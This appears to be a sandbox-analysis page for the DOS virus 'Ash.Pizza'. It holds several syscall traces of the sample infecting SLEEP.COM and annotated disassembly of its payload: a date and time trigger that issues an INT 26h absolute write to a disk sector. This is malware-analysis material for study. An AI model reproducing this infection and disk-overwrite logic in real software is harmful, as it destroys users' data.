Sample viewer

vx.netlux.org/Virus.DOS.Ash.Pizza.x

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:46:18.804378499Z 26 PC: 12acb | Set disk transfer address
2018-12-17T22:46:18.805889691Z 78 PC: 12b23 | Find first file
2018-12-17T22:46:18.811842743Z 61 PC: 12b2f | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:18.817927058Z 63 PC: 12b3e | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:18.824442126Z 66 PC: 12b55 | Move file pointer
2018-12-17T22:46:18.825787073Z 64 PC: 12b69 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:18.828844335Z 64 PC: 12a71 | Write file or device (Write 1582 bytes on handle 5)
2018-12-17T22:46:19.098122715Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:46:19.099447761Z 64 PC: 12ba9 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:19.105863908Z 62 PC: 12b17 | Close file
2018-12-17T22:46:19.11464696Z 79 PC: 12b23 | Find next file
2018-12-17T22:46:19.117281873Z 61 PC: 12b2f | Open file (Filename = '')
2018-12-17T22:46:19.119300719Z 79 PC: 12b23 | Find next file
2018-12-17T22:46:19.121886498Z 61 PC: 12b2f | Open file (Filename = '')
2018-12-17T22:46:19.124199271Z 79 PC: 12b23 | Find next file
2018-12-17T22:46:19.1266116Z 61 PC: 12b2f | Open file (Filename = '')
2018-12-17T22:46:19.131022619Z 79 PC: 12b23 | Find next file
2018-12-17T22:46:19.133416334Z 61 PC: 12b2f | Open file (Filename = '')
2018-12-17T22:46:19.135348143Z 79 PC: 12b23 | Find next file
2018-12-17T22:46:19.137601719Z 61 PC: 12b2f | Open file (Filename = '')
2018-12-17T22:46:19.139792389Z 79 PC: 12b23 | Find next file
2018-12-17T22:46:19.141625853Z 61 PC: 12b2f | Open file (Filename = '')
2018-12-17T22:46:19.143862947Z 79 PC: 12b23 | Find next file
2018-12-17T22:46:19.147354716Z 59 PC: 12bd7 | Change current directory
; Disassembly window logged after INT 21h Get date (AH=2Ah returns DH = month, DL = day of month).
; It is the date/time gate in front of the int 0x26 shown in the window logged at PC 12bf9.
; NOTE(review): 0x12c13 and 0x12c20 lie outside this window; see the later windows of this trace.
2018-12-17T22:46:19.151579433Z 42 PC: 12be6 | Get date 0x12be6: cmp dl, 4  ; day of month == 4 ?
0x12be9: jne 0x12bf5  ; no -> fall back to the time-of-day check
0x12beb: cmp dh, 7  ; month == 7 ?
0x12bee: jne 0x12bf5
0x12bf0: xor ax, ax  ; 4 July: AX = 0 ...
0x12bf2: jmp 0x12c13  ; ... and go straight to 0x12c13
0x12bf4: nop
0x12bf5: mov ah, 0x2c  ; INT 21h AH=2Ch, Get time: CH = hour, CL = minute, DH = second, DL = 1/100 s
0x12bf7: int 0x21
0x12bf9: or cl, cl  ; minute != 0 -> 0x12c20
0x12bfb: jne 0x12c20
0x12bfd: cmp ch, 6  ; hour >= 6 -> 0x12c20
0x12c00: jge 0x12c20
0x12c02: add cl, ch  ; CL is 0 here, so CL = hour
0x12c04: mov ax, cx
0x12c06: cwde  ; NOTE(review): one byte long, so in this 16-bit code presumably cbw (sign-extend AL into AX)
0x12c07: add al, dh  ; mix the seconds ...
0x12c09: adc al, dl  ; ... and the hundredths into AL
0x12c0b: adc ah, 0  ; propagate the carry into AH
0x12c0e: or ax, ax  ; sets flags for the next instruction, which is outside this window
; Disassembly window logged after INT 21h Get time (AH=2Ch returns CH = hour, CL = minute, DH = second, DL = 1/100 s).
; Time gate (minute == 0 and hour < 6) followed by an INT 26h absolute disk write of one sector.
; In this run the next logged call is Get time at PC 12c27, so presumably one of the jumps to 0x12c20 was taken.
2018-12-17T22:46:19.154023922Z 44 PC: 12bf9 | Get time 0x12bf9: or cl, cl  ; minute != 0 -> 0x12c20, no disk write
0x12bfb: jne 0x12c20
0x12bfd: cmp ch, 6  ; hour >= 6 -> 0x12c20, no disk write
0x12c00: jge 0x12c20
0x12c02: add cl, ch  ; CL is 0 here, so CL = hour
0x12c04: mov ax, cx
0x12c06: cwde  ; NOTE(review): one byte long, so in this 16-bit code presumably cbw (sign-extend AL into AX)
0x12c07: add al, dh  ; mix the seconds ...
0x12c09: adc al, dl  ; ... and the hundredths into AL
0x12c0b: adc ah, 0  ; propagate the carry into AH
0x12c0e: or ax, ax  ; computed value == 0 ?
0x12c10: jne 0x12c13
0x12c12: inc ax  ; yes -> use 1; AX = 0 reaches 0x12c13 only via the 4 July branch in the Get date window
0x12c13: mov dx, ax  ; DX = first logical sector for INT 26h
0x12c15: mov cx, 1  ; CX = number of sectors
0x12c18: xor bx, bx  ; BX = 0: the buffer is DS:0000 (its contents are not visible on this page)
0x12c1a: mov ah, 0x19  ; INT 21h AH=19h, Get default drive -> AL
0x12c1c: int 0x21
0x12c1e: int 0x26  ; DOS absolute disk write: drive AL, CX sectors from DS:BX to logical sector DX
0x12c20: mov bx, 0x3cd  ; no-trigger path; the window logged at PC 12c27 indexes a word table with BX
; Disassembly window logged after a second Get time call (DH = second).
; Selects one entry of a word table by the seconds value, prints the string it points to,
; then branches on the byte stored immediately before that string.
2018-12-17T22:46:19.157087138Z 44 PC: 12c27 | Get time 0x12c27: inc dh  ; DH = second + 1
0x12c29: cmp dh, byte ptr [0x3f5]  ; reduce DH below the byte at 0x3f5 (presumably the entry count) by repeated subtraction
0x12c2d: jl 0x12c35
0x12c2f: sub dh, byte ptr [0x3f5]
0x12c33: jmp 0x12c29
0x12c35: mov al, dh  ; AL = table index
0x12c37: mov cl, al
0x12c39: cwde  ; NOTE(review): one byte long, so in this 16-bit code presumably cbw (sign-extend AL into AX)
0x12c3a: shl ax, 1  ; index * 2: the entries are 16-bit words
0x12c3c: add bx, ax  ; NOTE(review): BX presumably still holds 0x3cd from 0x12c20; 0x12c23-0x12c26 are not shown
0x12c3e: mov si, word ptr [bx]  ; SI = offset of the selected string
0x12c40: mov ch, byte ptr [si - 1]  ; CH = byte just before the string, used as a selector below
0x12c43: mov dx, si
0x12c45: mov ah, 9  ; INT 21h AH=09h, Display string at DS:DX ('$'-terminated)
0x12c47: int 0x21
0x12c49: cmp ch, 0  ; dispatch on the selector byte
0x12c4c: je 0x12c77  ; 0 -> 0x12c77 (outside this window)
0x12c4e: cmp ch, 1
0x12c51: je 0x12c51  ; 1 -> the branch targets itself, so execution spins here
0x12c53: cmp ch, 2  ; further cases continue past this window
2018-12-17T22:46:19.159200459Z 9 PC: 12c49 | Display string (Could not find end pointer)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8840,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:57.769814445Z 26 PC: 12acb | Set disk transfer address
2018-12-25T12:21:57.771211235Z 78 PC: 12b23 | Find first file
2018-12-25T12:21:57.776906985Z 61 PC: 12b2f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:57.783112244Z 63 PC: 12b3e | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:21:57.78944477Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:21:57.790703038Z 64 PC: 12b69 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:57.793754058Z 64 PC: 12a71 | Write file or device (Write 1582 bytes on handle 5)
2018-12-25T12:21:58.893682984Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:21:58.895259232Z 64 PC: 12ba9 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:58.902123721Z 62 PC: 12b17 | Close file
2018-12-25T12:21:58.980098976Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:58.982527559Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:58.983919366Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:58.985490187Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:58.987624598Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:58.989691712Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:58.991090884Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:58.993198379Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:58.99463482Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:58.996251522Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:58.99819666Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:58.999925597Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:59.001415527Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:59.003620567Z 59 PC: 12bd7 | Change current directory
; Disassembly window logged after INT 21h Get date (AH=2Ah returns DH = month, DL = day of month).
; It is the date/time gate in front of the int 0x26 shown in the window logged at PC 12bf9.
; NOTE(review): 0x12c13 and 0x12c20 lie outside this window; see the next window of this trace.
2018-12-25T12:21:59.006194391Z 42 PC: 12be6 | Get date 0x12be6: cmp dl, 4  ; day of month == 4 ?
0x12be9: jne 0x12bf5  ; no -> fall back to the time-of-day check
0x12beb: cmp dh, 7  ; month == 7 ?
0x12bee: jne 0x12bf5
0x12bf0: xor ax, ax  ; 4 July: AX = 0 ...
0x12bf2: jmp 0x12c13  ; ... and go straight to 0x12c13
0x12bf4: nop
0x12bf5: mov ah, 0x2c  ; INT 21h AH=2Ch, Get time: CH = hour, CL = minute, DH = second, DL = 1/100 s
0x12bf7: int 0x21
0x12bf9: or cl, cl  ; minute != 0 -> 0x12c20
0x12bfb: jne 0x12c20
0x12bfd: cmp ch, 6  ; hour >= 6 -> 0x12c20
0x12c00: jge 0x12c20
0x12c02: add cl, ch  ; CL is 0 here, so CL = hour
0x12c04: mov ax, cx
0x12c06: cwde  ; NOTE(review): one byte long, so in this 16-bit code presumably cbw (sign-extend AL into AX)
0x12c07: add al, dh  ; mix the seconds ...
0x12c09: adc al, dl  ; ... and the hundredths into AL
0x12c0b: adc ah, 0  ; propagate the carry into AH
0x12c0e: or ax, ax  ; sets flags for the next instruction, which is outside this window
; Disassembly window logged after INT 21h Get time (AH=2Ch returns CH = hour, CL = minute, DH = second, DL = 1/100 s).
; Time gate (minute == 0 and hour < 6) followed by an INT 26h absolute disk write of one sector.
; This run's last logged call is Get default drive at PC 12c1e, so execution reached the int 0x26 below;
; NOTE(review): presumably the sandbox stops at, or does not log, INT 26h - confirm against the tool.
2018-12-25T12:21:59.007625516Z 44 PC: 12bf9 | Get time 0x12bf9: or cl, cl  ; minute != 0 -> 0x12c20, no disk write
0x12bfb: jne 0x12c20
0x12bfd: cmp ch, 6  ; hour >= 6 -> 0x12c20, no disk write
0x12c00: jge 0x12c20
0x12c02: add cl, ch  ; CL is 0 here, so CL = hour
0x12c04: mov ax, cx
0x12c06: cwde  ; NOTE(review): one byte long, so in this 16-bit code presumably cbw (sign-extend AL into AX)
0x12c07: add al, dh  ; mix the seconds ...
0x12c09: adc al, dl  ; ... and the hundredths into AL
0x12c0b: adc ah, 0  ; propagate the carry into AH
0x12c0e: or ax, ax  ; computed value == 0 ?
0x12c10: jne 0x12c13
0x12c12: inc ax  ; yes -> use 1; AX = 0 reaches 0x12c13 only via the 4 July branch in the Get date window
0x12c13: mov dx, ax  ; DX = first logical sector for INT 26h
0x12c15: mov cx, 1  ; CX = number of sectors
0x12c18: xor bx, bx  ; BX = 0: the buffer is DS:0000 (its contents are not visible on this page)
0x12c1a: mov ah, 0x19  ; INT 21h AH=19h, Get default drive -> AL
0x12c1c: int 0x21
0x12c1e: int 0x26  ; DOS absolute disk write: drive AL, CX sectors from DS:BX to logical sector DX
0x12c20: mov bx, 0x3cd  ; target of the two no-trigger jumps above; not traced further in this run
2018-12-25T12:21:59.010466008Z 25 PC: 12c1e | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8840,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:58.364254968Z 26 PC: 12acb | Set disk transfer address
2018-12-25T12:21:58.365785171Z 78 PC: 12b23 | Find first file
2018-12-25T12:21:58.371740255Z 61 PC: 12b2f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:58.378595631Z 63 PC: 12b3e | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:21:58.402355903Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:21:58.403738957Z 64 PC: 12b69 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:58.406989351Z 64 PC: 12a71 | Write file or device (Write 1582 bytes on handle 5)
2018-12-25T12:21:59.140843351Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:21:59.143120997Z 64 PC: 12ba9 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:59.150380804Z 62 PC: 12b17 | Close file
2018-12-25T12:21:59.158712203Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:59.162707151Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:59.164819037Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:59.167257375Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:59.170485358Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:59.173020803Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:59.175122369Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:59.178267944Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:59.180525464Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:59.183169662Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:59.18597112Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:59.188518764Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:21:59.190795991Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:21:59.193989752Z 59 PC: 12bd7 | Change current directory
; Disassembly window logged after INT 21h Get date (AH=2Ah returns DH = month, DL = day of month).
; It is the date/time gate in front of the int 0x26 shown in the window logged at PC 12bf9.
; NOTE(review): 0x12c13 and 0x12c20 lie outside this window; see the next window of this trace.
2018-12-25T12:21:59.197921688Z 42 PC: 12be6 | Get date 0x12be6: cmp dl, 4  ; day of month == 4 ?
0x12be9: jne 0x12bf5  ; no -> fall back to the time-of-day check
0x12beb: cmp dh, 7  ; month == 7 ?
0x12bee: jne 0x12bf5
0x12bf0: xor ax, ax  ; 4 July: AX = 0 ...
0x12bf2: jmp 0x12c13  ; ... and go straight to 0x12c13
0x12bf4: nop
0x12bf5: mov ah, 0x2c  ; INT 21h AH=2Ch, Get time: CH = hour, CL = minute, DH = second, DL = 1/100 s
0x12bf7: int 0x21
0x12bf9: or cl, cl  ; minute != 0 -> 0x12c20
0x12bfb: jne 0x12c20
0x12bfd: cmp ch, 6  ; hour >= 6 -> 0x12c20
0x12c00: jge 0x12c20
0x12c02: add cl, ch  ; CL is 0 here, so CL = hour
0x12c04: mov ax, cx
0x12c06: cwde  ; NOTE(review): one byte long, so in this 16-bit code presumably cbw (sign-extend AL into AX)
0x12c07: add al, dh  ; mix the seconds ...
0x12c09: adc al, dl  ; ... and the hundredths into AL
0x12c0b: adc ah, 0  ; propagate the carry into AH
0x12c0e: or ax, ax  ; sets flags for the next instruction, which is outside this window
; Disassembly window logged after INT 21h Get time (AH=2Ch returns CH = hour, CL = minute, DH = second, DL = 1/100 s).
; Time gate (minute == 0 and hour < 6) followed by an INT 26h absolute disk write of one sector.
; This run's last logged call is Get default drive at PC 12c1e, so execution reached the int 0x26 below;
; NOTE(review): presumably the sandbox stops at, or does not log, INT 26h - confirm against the tool.
2018-12-25T12:21:59.199934698Z 44 PC: 12bf9 | Get time 0x12bf9: or cl, cl  ; minute != 0 -> 0x12c20, no disk write
0x12bfb: jne 0x12c20
0x12bfd: cmp ch, 6  ; hour >= 6 -> 0x12c20, no disk write
0x12c00: jge 0x12c20
0x12c02: add cl, ch  ; CL is 0 here, so CL = hour
0x12c04: mov ax, cx
0x12c06: cwde  ; NOTE(review): one byte long, so in this 16-bit code presumably cbw (sign-extend AL into AX)
0x12c07: add al, dh  ; mix the seconds ...
0x12c09: adc al, dl  ; ... and the hundredths into AL
0x12c0b: adc ah, 0  ; propagate the carry into AH
0x12c0e: or ax, ax  ; computed value == 0 ?
0x12c10: jne 0x12c13
0x12c12: inc ax  ; yes -> use 1; AX = 0 reaches 0x12c13 only via the 4 July branch in the Get date window
0x12c13: mov dx, ax  ; DX = first logical sector for INT 26h
0x12c15: mov cx, 1  ; CX = number of sectors
0x12c18: xor bx, bx  ; BX = 0: the buffer is DS:0000 (its contents are not visible on this page)
0x12c1a: mov ah, 0x19  ; INT 21h AH=19h, Get default drive -> AL
0x12c1c: int 0x21
0x12c1e: int 0x26  ; DOS absolute disk write: drive AL, CX sectors from DS:BX to logical sector DX
0x12c20: mov bx, 0x3cd  ; target of the two no-trigger jumps above; not traced further in this run
2018-12-25T12:21:59.202941609Z 25 PC: 12c1e | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8840,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:05.154500879Z 26 PC: 12acb | Set disk transfer address
2018-12-25T12:22:05.156191809Z 78 PC: 12b23 | Find first file
2018-12-25T12:22:05.162293128Z 61 PC: 12b2f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:05.16893266Z 63 PC: 12b3e | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:05.175832107Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:22:05.177593284Z 64 PC: 12b69 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:05.18185518Z 64 PC: 12a71 | Write file or device (Write 1582 bytes on handle 5)
2018-12-25T12:22:05.196719773Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:22:05.198421748Z 64 PC: 12ba9 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:05.204691234Z 62 PC: 12b17 | Close file
2018-12-25T12:22:05.218102318Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.220156986Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.221859566Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.224230135Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.227027912Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.229443066Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.231400273Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.234182262Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.236266811Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.238696209Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.241506947Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.243896965Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.245860265Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.248654827Z 59 PC: 12bd7 | Change current directory
; Disassembly window logged after INT 21h Get date (AH=2Ah returns DH = month, DL = day of month).
; It is the date/time gate in front of the int 0x26 shown in the window logged at PC 12bf9.
; NOTE(review): 0x12c13 and 0x12c20 lie outside this window; see the later windows of this trace.
2018-12-25T12:22:05.252735852Z 42 PC: 12be6 | Get date 0x12be6: cmp dl, 4  ; day of month == 4 ?
0x12be9: jne 0x12bf5  ; no -> fall back to the time-of-day check
0x12beb: cmp dh, 7  ; month == 7 ?
0x12bee: jne 0x12bf5
0x12bf0: xor ax, ax  ; 4 July: AX = 0 ...
0x12bf2: jmp 0x12c13  ; ... and go straight to 0x12c13
0x12bf4: nop
0x12bf5: mov ah, 0x2c  ; INT 21h AH=2Ch, Get time: CH = hour, CL = minute, DH = second, DL = 1/100 s
0x12bf7: int 0x21
0x12bf9: or cl, cl  ; minute != 0 -> 0x12c20
0x12bfb: jne 0x12c20
0x12bfd: cmp ch, 6  ; hour >= 6 -> 0x12c20
0x12c00: jge 0x12c20
0x12c02: add cl, ch  ; CL is 0 here, so CL = hour
0x12c04: mov ax, cx
0x12c06: cwde  ; NOTE(review): one byte long, so in this 16-bit code presumably cbw (sign-extend AL into AX)
0x12c07: add al, dh  ; mix the seconds ...
0x12c09: adc al, dl  ; ... and the hundredths into AL
0x12c0b: adc ah, 0  ; propagate the carry into AH
0x12c0e: or ax, ax  ; sets flags for the next instruction, which is outside this window
; Disassembly window logged after INT 21h Get time (AH=2Ch returns CH = hour, CL = minute, DH = second, DL = 1/100 s).
; Time gate (minute == 0 and hour < 6) followed by an INT 26h absolute disk write of one sector.
; In this run the next logged call is Get time at PC 12c27, so presumably one of the jumps to 0x12c20 was taken.
2018-12-25T12:22:05.254716434Z 44 PC: 12bf9 | Get time 0x12bf9: or cl, cl  ; minute != 0 -> 0x12c20, no disk write
0x12bfb: jne 0x12c20
0x12bfd: cmp ch, 6  ; hour >= 6 -> 0x12c20, no disk write
0x12c00: jge 0x12c20
0x12c02: add cl, ch  ; CL is 0 here, so CL = hour
0x12c04: mov ax, cx
0x12c06: cwde  ; NOTE(review): one byte long, so in this 16-bit code presumably cbw (sign-extend AL into AX)
0x12c07: add al, dh  ; mix the seconds ...
0x12c09: adc al, dl  ; ... and the hundredths into AL
0x12c0b: adc ah, 0  ; propagate the carry into AH
0x12c0e: or ax, ax  ; computed value == 0 ?
0x12c10: jne 0x12c13
0x12c12: inc ax  ; yes -> use 1; AX = 0 reaches 0x12c13 only via the 4 July branch in the Get date window
0x12c13: mov dx, ax  ; DX = first logical sector for INT 26h
0x12c15: mov cx, 1  ; CX = number of sectors
0x12c18: xor bx, bx  ; BX = 0: the buffer is DS:0000 (its contents are not visible on this page)
0x12c1a: mov ah, 0x19  ; INT 21h AH=19h, Get default drive -> AL
0x12c1c: int 0x21
0x12c1e: int 0x26  ; DOS absolute disk write: drive AL, CX sectors from DS:BX to logical sector DX
0x12c20: mov bx, 0x3cd  ; no-trigger path; the window logged at PC 12c27 indexes a word table with BX
; Disassembly window logged after a second Get time call (DH = second).
; Selects one entry of a word table by the seconds value, prints the string it points to,
; then branches on the byte stored immediately before that string.
2018-12-25T12:22:05.259169274Z 44 PC: 12c27 | Get time 0x12c27: inc dh  ; DH = second + 1
0x12c29: cmp dh, byte ptr [0x3f5]  ; reduce DH below the byte at 0x3f5 (presumably the entry count) by repeated subtraction
0x12c2d: jl 0x12c35
0x12c2f: sub dh, byte ptr [0x3f5]
0x12c33: jmp 0x12c29
0x12c35: mov al, dh  ; AL = table index
0x12c37: mov cl, al
0x12c39: cwde  ; NOTE(review): one byte long, so in this 16-bit code presumably cbw (sign-extend AL into AX)
0x12c3a: shl ax, 1  ; index * 2: the entries are 16-bit words
0x12c3c: add bx, ax  ; NOTE(review): BX presumably still holds 0x3cd from 0x12c20; 0x12c23-0x12c26 are not shown
0x12c3e: mov si, word ptr [bx]  ; SI = offset of the selected string
0x12c40: mov ch, byte ptr [si - 1]  ; CH = byte just before the string, used as a selector below
0x12c43: mov dx, si
0x12c45: mov ah, 9  ; INT 21h AH=09h, Display string at DS:DX ('$'-terminated)
0x12c47: int 0x21
0x12c49: cmp ch, 0  ; dispatch on the selector byte
0x12c4c: je 0x12c77  ; 0 -> 0x12c77 (outside this window)
0x12c4e: cmp ch, 1
0x12c51: je 0x12c51  ; 1 -> the branch targets itself, so execution spins here
0x12c53: cmp ch, 2  ; further cases continue past this window
2018-12-25T12:22:05.261217144Z 9 PC: 12c49 | Display string (Could not find end pointer)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8840,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:05.771763044Z 26 PC: 12acb | Set disk transfer address
2018-12-25T12:22:05.773299951Z 78 PC: 12b23 | Find first file
2018-12-25T12:22:05.779201379Z 61 PC: 12b2f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:05.785697497Z 63 PC: 12b3e | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:05.792543937Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:22:05.793889825Z 64 PC: 12b69 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:05.797190054Z 64 PC: 12a71 | Write file or device (Write 1582 bytes on handle 5)
2018-12-25T12:22:05.812219919Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:22:05.813716916Z 64 PC: 12ba9 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:05.8199969Z 62 PC: 12b17 | Close file
2018-12-25T12:22:05.82890206Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.832581203Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.834724774Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.83713006Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.839315763Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.841766584Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.843918194Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.847127565Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.84942665Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.852118676Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.854639958Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.856960871Z 61 PC: 12b2f | Open file (See above)
2018-12-25T12:22:05.859005196Z 79 PC: 12b23 | Find next file (See above)
2018-12-25T12:22:05.862444002Z 59 PC: 12bd7 | Change current directory
; Disassembly window logged after INT 21h Get date (AH=2Ah returns DH = month, DL = day of month).
; It is the date/time gate in front of the int 0x26 shown in the window logged at PC 12bf9.
; NOTE(review): 0x12c13 and 0x12c20 lie outside this window; see the later windows of this trace.
2018-12-25T12:22:05.866387678Z 42 PC: 12be6 | Get date 0x12be6: cmp dl, 4  ; day of month == 4 ?
0x12be9: jne 0x12bf5  ; no -> fall back to the time-of-day check
0x12beb: cmp dh, 7  ; month == 7 ?
0x12bee: jne 0x12bf5
0x12bf0: xor ax, ax  ; 4 July: AX = 0 ...
0x12bf2: jmp 0x12c13  ; ... and go straight to 0x12c13
0x12bf4: nop
0x12bf5: mov ah, 0x2c  ; INT 21h AH=2Ch, Get time: CH = hour, CL = minute, DH = second, DL = 1/100 s
0x12bf7: int 0x21
0x12bf9: or cl, cl  ; minute != 0 -> 0x12c20
0x12bfb: jne 0x12c20
0x12bfd: cmp ch, 6  ; hour >= 6 -> 0x12c20
0x12c00: jge 0x12c20
0x12c02: add cl, ch  ; CL is 0 here, so CL = hour
0x12c04: mov ax, cx
0x12c06: cwde  ; NOTE(review): one byte long, so in this 16-bit code presumably cbw (sign-extend AL into AX)
0x12c07: add al, dh  ; mix the seconds ...
0x12c09: adc al, dl  ; ... and the hundredths into AL
0x12c0b: adc ah, 0  ; propagate the carry into AH
0x12c0e: or ax, ax  ; sets flags for the next instruction, which is outside this window
; Disassembly window logged after INT 21h Get time (AH=2Ch returns CH = hour, CL = minute, DH = second, DL = 1/100 s).
; Time gate (minute == 0 and hour < 6) followed by an INT 26h absolute disk write of one sector.
; In this run the next logged call is Get time at PC 12c27, so presumably one of the jumps to 0x12c20 was taken.
2018-12-25T12:22:05.868477702Z 44 PC: 12bf9 | Get time 0x12bf9: or cl, cl  ; minute != 0 -> 0x12c20, no disk write
0x12bfb: jne 0x12c20
0x12bfd: cmp ch, 6  ; hour >= 6 -> 0x12c20, no disk write
0x12c00: jge 0x12c20
0x12c02: add cl, ch  ; CL is 0 here, so CL = hour
0x12c04: mov ax, cx
0x12c06: cwde  ; NOTE(review): one byte long, so in this 16-bit code presumably cbw (sign-extend AL into AX)
0x12c07: add al, dh  ; mix the seconds ...
0x12c09: adc al, dl  ; ... and the hundredths into AL
0x12c0b: adc ah, 0  ; propagate the carry into AH
0x12c0e: or ax, ax  ; computed value == 0 ?
0x12c10: jne 0x12c13
0x12c12: inc ax  ; yes -> use 1; AX = 0 reaches 0x12c13 only via the 4 July branch in the Get date window
0x12c13: mov dx, ax  ; DX = first logical sector for INT 26h
0x12c15: mov cx, 1  ; CX = number of sectors
0x12c18: xor bx, bx  ; BX = 0: the buffer is DS:0000 (its contents are not visible on this page)
0x12c1a: mov ah, 0x19  ; INT 21h AH=19h, Get default drive -> AL
0x12c1c: int 0x21
0x12c1e: int 0x26  ; DOS absolute disk write: drive AL, CX sectors from DS:BX to logical sector DX
0x12c20: mov bx, 0x3cd  ; no-trigger path; the window logged at PC 12c27 indexes a word table with BX
; Disassembly window logged after a second Get time call (DH = second).
; Selects one entry of a word table by the seconds value, prints the string it points to,
; then branches on the byte stored immediately before that string.
2018-12-25T12:22:05.876126622Z 44 PC: 12c27 | Get time 0x12c27: inc dh  ; DH = second + 1
0x12c29: cmp dh, byte ptr [0x3f5]  ; reduce DH below the byte at 0x3f5 (presumably the entry count) by repeated subtraction
0x12c2d: jl 0x12c35
0x12c2f: sub dh, byte ptr [0x3f5]
0x12c33: jmp 0x12c29
0x12c35: mov al, dh  ; AL = table index
0x12c37: mov cl, al
0x12c39: cwde  ; NOTE(review): one byte long, so in this 16-bit code presumably cbw (sign-extend AL into AX)
0x12c3a: shl ax, 1  ; index * 2: the entries are 16-bit words
0x12c3c: add bx, ax  ; NOTE(review): BX presumably still holds 0x3cd from 0x12c20; 0x12c23-0x12c26 are not shown
0x12c3e: mov si, word ptr [bx]  ; SI = offset of the selected string
0x12c40: mov ch, byte ptr [si - 1]  ; CH = byte just before the string, used as a selector below
